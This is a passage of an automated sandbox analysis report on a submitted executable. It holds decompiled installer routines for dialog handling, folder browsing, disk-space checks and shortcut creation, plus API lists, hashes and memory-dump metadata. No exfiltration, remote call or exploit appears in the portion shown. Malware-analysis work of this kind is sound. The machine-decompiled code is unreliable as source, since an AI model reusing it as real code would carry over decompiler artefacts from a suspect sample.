                                                  								goto L23;
                                                  							} else {
                                                  								ShowWindow(_v12, 5);
                                                  								E00403FEC(_v12);
                                                  								L89:
                                                  								return E0040401E(_a8, _a12, _a16);
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}


                                                  APIs
                                                  • GetDlgItem.USER32 ref: 0040494D
                                                  • GetDlgItem.USER32 ref: 0040495A
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
                                                  • LoadBitmapA.USER32 ref: 004049B9
                                                  • SetWindowLongA.USER32 ref: 004049D3
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
                                                  • DeleteObject.GDI32(?), ref: 00404A33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
                                                  • GetWindowLongA.USER32 ref: 00404B6D
                                                  • SetWindowLongA.USER32 ref: 00404B7B
                                                  • ShowWindow.USER32(?,00000005), ref: 00404B8C
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D68
                                                  • GlobalFree.KERNEL32 ref: 00404D78
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
                                                  • ShowWindow.USER32(?,00000000), ref: 00404F0E
                                                  • GetDlgItem.USER32 ref: 00404F19
                                                  • ShowWindow.USER32(00000000), ref: 00404F20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                  • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                                                  • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                  • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				long _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				long _v36;
                                                  				char _v40;
                                                  				unsigned int _v44;
                                                  				signed int _v48;
                                                  				CHAR* _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				CHAR* _v72;
                                                  				void _v76;
                                                  				struct HWND__* _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t82;
                                                  				long _t87;
                                                  				signed char* _t89;
                                                  				void* _t95;
                                                  				signed int _t96;
                                                  				int _t109;
                                                  				signed short _t114;
                                                  				signed int _t118;
                                                  				struct HWND__** _t122;
                                                  				intOrPtr* _t138;
                                                  				CHAR* _t146;
                                                  				unsigned int _t150;
                                                  				signed int _t152;
                                                  				unsigned int _t156;
                                                  				signed int _t158;
                                                  				signed int* _t159;
                                                  				struct HWND__* _t165;
                                                  				struct HWND__* _t166;
                                                  				int _t168;
                                                  				unsigned int _t197;
                                                  
                                                  				_t156 = __edx;
                                                  				_t82 =  *0x41fd50;
                                                  				_v32 = _t82;
                                                  				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                  				if(_a8 == 0x40b) {
                                                  					E004055A0(0x3fb, _t146);
                                                  					E00405F5D(_t146);
                                                  				}
                                                  				_t166 = _a4;
                                                  				if(_a8 != 0x110) {
                                                  					L8:
                                                  					if(_a8 != 0x111) {
                                                  						L20:
                                                  						if(_a8 == 0x40f) {
                                                  							L22:
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_v12 = _v12 & 0x00000000;
                                                  							E004055A0(0x3fb, _t146);
                                                  							if(E004058CF(_t185, _t146) == 0) {
                                                  								_v8 = 1;
                                                  							}
                                                  							E00405CFB(0x41f548, _t146);
                                                  							_t87 = E00406087(1);
                                                  							_v16 = _t87;
                                                  							if(_t87 == 0) {
                                                  								L30:
                                                  								E00405CFB(0x41f548, _t146);
                                                  								_t89 = E00405882(0x41f548);
                                                  								_t158 = 0;
                                                  								if(_t89 != 0) {
                                                  									 *_t89 =  *_t89 & 0x00000000;
                                                  								}
                                                  								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                  									goto L35;
                                                  								} else {
                                                  									_t168 = 0x400;
                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                  									asm("cdq");
                                                  									_v48 = _t109;
                                                  									_v44 = _t156;
                                                  									_v12 = 1;
                                                  									goto L36;
                                                  								}
                                                  							} else {
                                                  								_t159 = 0;
                                                  								if(0 == 0x41f548) {
                                                  									goto L30;
                                                  								} else {
                                                  									goto L26;
                                                  								}
                                                  								while(1) {
                                                  									L26:
                                                  									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
                                                  									if(_t114 != 0) {
                                                  										break;
                                                  									}
                                                  									if(_t159 != 0) {
                                                  										 *_t159 =  *_t159 & _t114;
                                                  									}
                                                  									_t159 = E00405835(0x41f548) - 1;
                                                  									 *_t159 = 0x5c;
                                                  									if(_t159 != 0x41f548) {
                                                  										continue;
                                                  									} else {
                                                  										goto L30;
                                                  									}
                                                  								}
                                                  								_t150 = _v44;
                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                  								_v44 = _t150 >> 0xa;
                                                  								_v12 = 1;
                                                  								_t158 = 0;
                                                  								__eflags = 0;
                                                  								L35:
                                                  								_t168 = 0x400;
                                                  								L36:
                                                  								_t95 = E00404889(5);
                                                  								if(_v12 != _t158) {
                                                  									_t197 = _v44;
                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                  										_v8 = 2;
                                                  									}
                                                  								}
                                                  								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
                                                  									E00404871(0x3ff, 0xfffffffb, _t95);
                                                  									if(_v12 == _t158) {
                                                  										SetDlgItemTextA(_a4, _t168, 0x41f538);
                                                  									} else {
                                                  										E004047AC(_t168, 0xfffffffc, _v48, _v44);
                                                  									}
                                                  								}
                                                  								_t96 = _v8;
                                                  								 *0x424024 = _t96;
                                                  								if(_t96 == _t158) {
                                                  									_v8 = E0040140B(7);
                                                  								}
                                                  								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                  									_v8 = _t158;
                                                  								}
                                                  								E00403FD9(0 | _v8 == _t158);
                                                  								if(_v8 == _t158 &&  *0x42056c == _t158) {
                                                  									E0040438A();
                                                  								}
                                                  								 *0x42056c = _t158;
                                                  								goto L53;
                                                  							}
                                                  						}
                                                  						_t185 = _a8 - 0x405;
                                                  						if(_a8 != 0x405) {
                                                  							goto L53;
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					_t118 = _a12 & 0x0000ffff;
                                                  					if(_t118 != 0x3fb) {
                                                  						L12:
                                                  						if(_t118 == 0x3e9) {
                                                  							_t152 = 7;
                                                  							memset( &_v76, 0, _t152 << 2);
                                                  							_v80 = _t166;
                                                  							_v72 = 0x420580;
                                                  							_v60 = E00404746;
                                                  							_v56 = _t146;
                                                  							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
                                                  							_t122 =  &_v80;
                                                  							_v64 = 0x41;
                                                  							__imp__SHBrowseForFolderA(_t122);
                                                  							if(_t122 == 0) {
                                                  								_a8 = 0x40f;
                                                  							} else {
                                                  								__imp__CoTaskMemFree(_t122);
                                                  								E004057EE(_t146);
                                                  								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
                                                  								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                  									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
                                                  									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
                                                  										lstrcatA(_t146, 0x422f20);
                                                  									}
                                                  								}
                                                  								 *0x42056c =  *0x42056c + 1;
                                                  								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					if(_a12 >> 0x10 != 0x300) {
                                                  						goto L53;
                                                  					}
                                                  					_a8 = 0x40f;
                                                  					goto L12;
                                                  				} else {
                                                  					_t165 = GetDlgItem(_t166, 0x3fb);
                                                  					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
                                                  						E004057EE(_t146);
                                                  					}
                                                  					 *0x423758 = _t166;
                                                  					SetWindowTextA(_t165, _t146);
                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                  					_push(1);
                                                  					E00403FB7(_t166);
                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  					_push(0x14);
                                                  					E00403FB7(_t166);
                                                  					E00403FEC(_t165);
                                                  					_t138 = E00406087(0xa);
                                                  					if(_t138 == 0) {
                                                  						L53:
                                                  						return E0040401E(_a8, _a12, _a16);
                                                  					} else {
                                                  						 *_t138(_t165, 1);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}













































                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404444
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                                                  • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                                                  • lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
                                                  • lstrcatA.KERNEL32(?,00422F20), ref: 00404568
                                                  • SetDlgItemTextA.USER32 ref: 0040457A
                                                    • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                    • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                  • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                                                    • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                    • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                                                    • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: /B$A$C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 2624150263-3569768251
                                                  • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                  • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                                                  • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                  • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E00402036() {
                                                  				void* _t44;
                                                  				intOrPtr* _t48;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t52;
                                                  				intOrPtr* _t54;
                                                  				signed int _t58;
                                                  				intOrPtr* _t59;
                                                  				intOrPtr* _t62;
                                                  				intOrPtr* _t64;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				int _t75;
                                                  				signed int _t81;
                                                  				intOrPtr* _t88;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t100;
                                                  
                                                  				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
                                                  				_t96 = E00402A0C(0xffffffdf);
                                                  				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
                                                  				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
                                                  				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
                                                  				if(E0040585B(_t96) == 0) {
                                                  					E00402A0C(0x21);
                                                  				}
                                                  				_t44 = _t100 + 8;
                                                  				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
                                                  				if(_t44 < _t75) {
                                                  					L13:
                                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                  					_push(0xfffffff0);
                                                  				} else {
                                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
                                                  					if(_t95 >= _t75) {
                                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                  						_t81 =  *(_t100 - 0x18);
                                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                  						if(_t58 != 0) {
                                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                  							_t81 =  *(_t100 - 0x18);
                                                  						}
                                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                  						}
                                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                  						if(_t95 >= _t75) {
                                                  							_t95 = 0x80004005;
                                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
                                                  								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
                                                  							}
                                                  						}
                                                  						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                  					}
                                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                  					if(_t95 >= _t75) {
                                                  						_push(0xfffffff4);
                                                  					} else {
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				E00401423();
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
                                                  				return 0;
                                                  			}






















                                                  APIs
                                                  • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-47812868
                                                  • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                  • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                                                  • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                  • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E00402654(char __ebx, char* __edi, char* __esi) {
                                                  				void* _t19;
                                                  
                                                  				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
                                                  					E00405C59(__edi, _t6);
                                                  					_push(_t19 - 0x170);
                                                  					_push(__esi);
                                                  					E00405CFB();
                                                  				} else {
                                                  					 *__edi = __ebx;
                                                  					 *__esi = __ebx;
                                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                  • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                                                  • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                  • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                  				struct HWND__* _v32;
                                                  				void* _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t35;
                                                  				signed int _t37;
                                                  				signed int _t39;
                                                  				struct HWND__* _t49;
                                                  				signed int _t67;
                                                  				struct HWND__* _t73;
                                                  				signed int _t86;
                                                  				struct HWND__* _t91;
                                                  				signed int _t99;
                                                  				int _t103;
                                                  				signed int _t115;
                                                  				signed int _t116;
                                                  				int _t117;
                                                  				signed int _t122;
                                                  				struct HWND__* _t125;
                                                  				struct HWND__* _t126;
                                                  				int _t127;
                                                  				long _t130;
                                                  				int _t132;
                                                  				int _t133;
                                                  				void* _t134;
                                                  				void* _t141;
                                                  
                                                  				_t115 = _a8;
                                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                                  					_t35 = _a12;
                                                  					_t125 = _a4;
                                                  					__eflags = _t115 - 0x110;
                                                  					 *0x420564 = _t35;
                                                  					if(_t115 == 0x110) {
                                                  						 *0x423f88 = _t125;
                                                  						 *0x420578 = GetDlgItem(_t125, 1);
                                                  						_t91 = GetDlgItem(_t125, 2);
                                                  						_push(0xffffffff);
                                                  						_push(0x1c);
                                                  						 *0x41f540 = _t91;
                                                  						E00403FB7(_t125);
                                                  						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
                                                  						 *0x42374c = E0040140B(4);
                                                  						_t35 = 1;
                                                  						__eflags = 1;
                                                  						 *0x420564 = 1;
                                                  					}
                                                  					_t122 =  *0x4091e8; // 0xffffffff
                                                  					_t133 = 0;
                                                  					_t130 = (_t122 << 6) +  *0x423fa0;
                                                  					__eflags = _t122;
                                                  					if(_t122 < 0) {
                                                  						L34:
                                                  						E00404003(0x40b);
                                                  						while(1) {
                                                  							_t37 =  *0x420564;
                                                  							 *0x4091e8 =  *0x4091e8 + _t37;
                                                  							_t130 = _t130 + (_t37 << 6);
                                                  							_t39 =  *0x4091e8; // 0xffffffff
                                                  							__eflags = _t39 -  *0x423fa4;
                                                  							if(_t39 ==  *0x423fa4) {
                                                  								E0040140B(1);
                                                  							}
                                                  							__eflags =  *0x42374c - _t133;
                                                  							if( *0x42374c != _t133) {
                                                  								break;
                                                  							}
                                                  							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t116 =  *(_t130 + 0x14);
                                                  							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
                                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                  							_push(0xfffffc19);
                                                  							E00403FB7(_t125);
                                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                  							_push(0xfffffc1b);
                                                  							E00403FB7(_t125);
                                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                  							_push(0xfffffc1a);
                                                  							E00403FB7(_t125);
                                                  							_t49 = GetDlgItem(_t125, 3);
                                                  							__eflags =  *0x42400c - _t133;
                                                  							_v32 = _t49;
                                                  							if( *0x42400c != _t133) {
                                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                  								__eflags = _t116;
                                                  							}
                                                  							ShowWindow(_t49, _t116 & 0x00000008);
                                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                  							E00403FD9(_t116 & 0x00000002);
                                                  							_t117 = _t116 & 0x00000004;
                                                  							EnableWindow( *0x41f540, _t117);
                                                  							__eflags = _t117 - _t133;
                                                  							if(_t117 == _t133) {
                                                  								_push(1);
                                                  							} else {
                                                  								_push(_t133);
                                                  							}
                                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                  							__eflags =  *0x42400c - _t133;
                                                  							if( *0x42400c == _t133) {
                                                  								_push( *0x420578);
                                                  							} else {
                                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                                  								_push( *0x41f540);
                                                  							}
                                                  							E00403FEC();
                                                  							E00405CFB(0x420580, 0x423780);
                                                  							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                  							SetWindowTextA(_t125, 0x420580);
                                                  							_push(_t133);
                                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                  							__eflags = _t67;
                                                  							if(_t67 != 0) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags =  *_t130 - _t133;
                                                  								if( *_t130 == _t133) {
                                                  									continue;
                                                  								}
                                                  								__eflags =  *(_t130 + 4) - 5;
                                                  								if( *(_t130 + 4) != 5) {
                                                  									DestroyWindow( *0x423758);
                                                  									 *0x41fd50 = _t130;
                                                  									__eflags =  *_t130 - _t133;
                                                  									if( *_t130 <= _t133) {
                                                  										goto L58;
                                                  									}
                                                  									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
                                                  									__eflags = _t73 - _t133;
                                                  									 *0x423758 = _t73;
                                                  									if(_t73 == _t133) {
                                                  										goto L58;
                                                  									}
                                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                  									_push(6);
                                                  									E00403FB7(_t73);
                                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                  									ScreenToClient(_t125, _t134 + 0x10);
                                                  									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
